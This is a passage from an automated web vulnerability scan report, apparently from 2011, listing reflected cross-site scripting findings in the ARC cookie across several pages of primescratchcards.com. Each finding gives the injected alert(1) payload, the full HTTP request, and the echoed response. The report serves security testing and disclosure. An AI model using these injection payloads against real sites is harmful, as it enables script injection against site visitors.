...[SNIP]...

3.114. http://primescratchcards.com/images/affiliates.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/affiliates.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fa3b"%3balert(1)//d22930547e was submitted in the ARC cookie. This input was echoed as 3fa3b";alert(1)//d22930547e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301373fa3b"%3balert(1)//d22930547e; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19396
Content-Type: text/html
Set-Cookie: ARC=1301373fa3b%22%3Balert%281%29%2F%2Fd22930547e; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301373fa3b";alert(1)//d22930547e' border='0' width='1' height='1'>
...[SNIP]...

3.115. http://primescratchcards.com/images/bg.jpg [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/bg.jpg

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c354'%3balert(1)//78c486a4ea7 was submitted in the ARC cookie. This input was echoed as 2c354';alert(1)//78c486a4ea7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/bg.jpg HTTP/1.1
Host: primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=1301372c354'%3balert(1)//78c486a4ea7

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301372c354%27%3Balert%281%29%2F%2F78c486a4ea7; expires=Tue, 15-May-2012 11:42:02 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=BKMOLGNDNJKAKAFGLDIAGACP; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301372c354';alert(1)//78c486a4ea7&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.116. http://primescratchcards.com/images/bg.jpg [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/bg.jpg

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 11f92--><script>alert(1)</script>092fca28c0d was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=13013711f92%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E092fca28c0d; expires=Tue, 15-May-2012 11:42:04 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=HKMOLGNDNIHAGDGLIENJFGLH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="13013711f92--><script>alert(1)</script>092fca28c0d">
...[SNIP]...

3.117. http://primescratchcards.com/images/bg.jpg [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/bg.jpg

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3566c"%3balert(1)//052f6e6caae was submitted in the ARC cookie. This input was echoed as 3566c";alert(1)//052f6e6caae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301373566c%22%3Balert%281%29%2F%2F052f6e6caae; expires=Tue, 15-May-2012 11:42:00 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=NJMOLGNDOCCNBEMDLFHPBAKN; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301373566c";alert(1)//052f6e6caae' border='0' width='1' height='1'>
...[SNIP]...

3.118. http://primescratchcards.com/images/contactus.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/contactus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f815d"%3balert(1)//a08662a17ad was submitted in the ARC cookie. This input was echoed as f815d";alert(1)//a08662a17ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f815d"%3balert(1)//a08662a17ad; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137f815d%22%3Balert%281%29%2F%2Fa08662a17ad; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137f815d";alert(1)//a08662a17ad' border='0' width='1' height='1'>
...[SNIP]...

3.119. http://primescratchcards.com/images/contactus.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/contactus.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 63c7a--><script>alert(1)</script>78f7646a362 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013763c7a--><script>alert(1)</script>78f7646a362; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=13013763c7a%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E78f7646a362; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="13013763c7a--><script>alert(1)</script>78f7646a362">
...[SNIP]...

3.120. http://primescratchcards.com/images/contactus.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/contactus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bef4'%3balert(1)//6be503d7a62 was submitted in the ARC cookie. This input was echoed as 5bef4';alert(1)//6be503d7a62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301375bef4'%3balert(1)//6be503d7a62; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301375bef4%27%3Balert%281%29%2F%2F6be503d7a62; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301375bef4';alert(1)//6be503d7a62&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.121. http://primescratchcards.com/images/fairplay.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/fairplay.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f253"%3balert(1)//b5a37874c72 was submitted in the ARC cookie. This input was echoed as 4f253";alert(1)//b5a37874c72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374f253"%3balert(1)//b5a37874c72; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301374f253%22%3Balert%281%29%2F%2Fb5a37874c72; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301374f253";alert(1)//b5a37874c72' border='0' width='1' height='1'>
...[SNIP]...

3.122. http://primescratchcards.com/images/fairplay.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/fairplay.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f04e'%3balert(1)//09abbe83f8b was submitted in the ARC cookie. This input was echoed as 6f04e';alert(1)//09abbe83f8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301376f04e'%3balert(1)//09abbe83f8b; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301376f04e%27%3Balert%281%29%2F%2F09abbe83f8b; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301376f04e';alert(1)//09abbe83f8b&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.123. http://primescratchcards.com/images/fairplay.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/fairplay.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 4836b--><script>alert(1)</script>825bfb200be was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374836b--><script>alert(1)</script>825bfb200be; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301374836b%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E825bfb200be; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301374836b--><script>alert(1)</script>825bfb200be">
...[SNIP]...

3.124. http://primescratchcards.com/images/help.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/help.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8db1"%3balert(1)//e159452f354 was submitted in the ARC cookie. This input was echoed as a8db1";alert(1)//e159452f354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137a8db1"%3balert(1)//e159452f354; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137a8db1%22%3Balert%281%29%2F%2Fe159452f354; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137a8db1";alert(1)//e159452f354' border='0' width='1' height='1'>
...[SNIP]...

3.125. http://primescratchcards.com/images/help.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/help.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 792f9--><script>alert(1)</script>6e1becf961c was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137792f9--><script>alert(1)</script>6e1becf961c; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137792f9%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6e1becf961c; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137792f9--><script>alert(1)</script>6e1becf961c">
...[SNIP]...

3.126. http://primescratchcards.com/images/help.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/help.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18010'%3balert(1)//6d6871f8cf2 was submitted in the ARC cookie. This input was echoed as 18010';alert(1)//6d6871f8cf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013718010'%3balert(1)//6d6871f8cf2; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013718010%27%3Balert%281%29%2F%2F6d6871f8cf2; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013718010';alert(1)//6d6871f8cf2&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.127. http://primescratchcards.com/images/index.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/index.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2d8c'%3balert(1)//103ff68b225 was submitted in the ARC cookie. This input was echoed as c2d8c';alert(1)//103ff68b225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137c2d8c'%3balert(1)//103ff68b225; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137c2d8c%27%3Balert%281%29%2F%2F103ff68b225; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137c2d8c';alert(1)//103ff68b225&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.128. http://primescratchcards.com/images/index.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/index.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5f1a"%3balert(1)//c43ea638988 was submitted in the ARC cookie. This input was echoed as f5f1a";alert(1)//c43ea638988 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
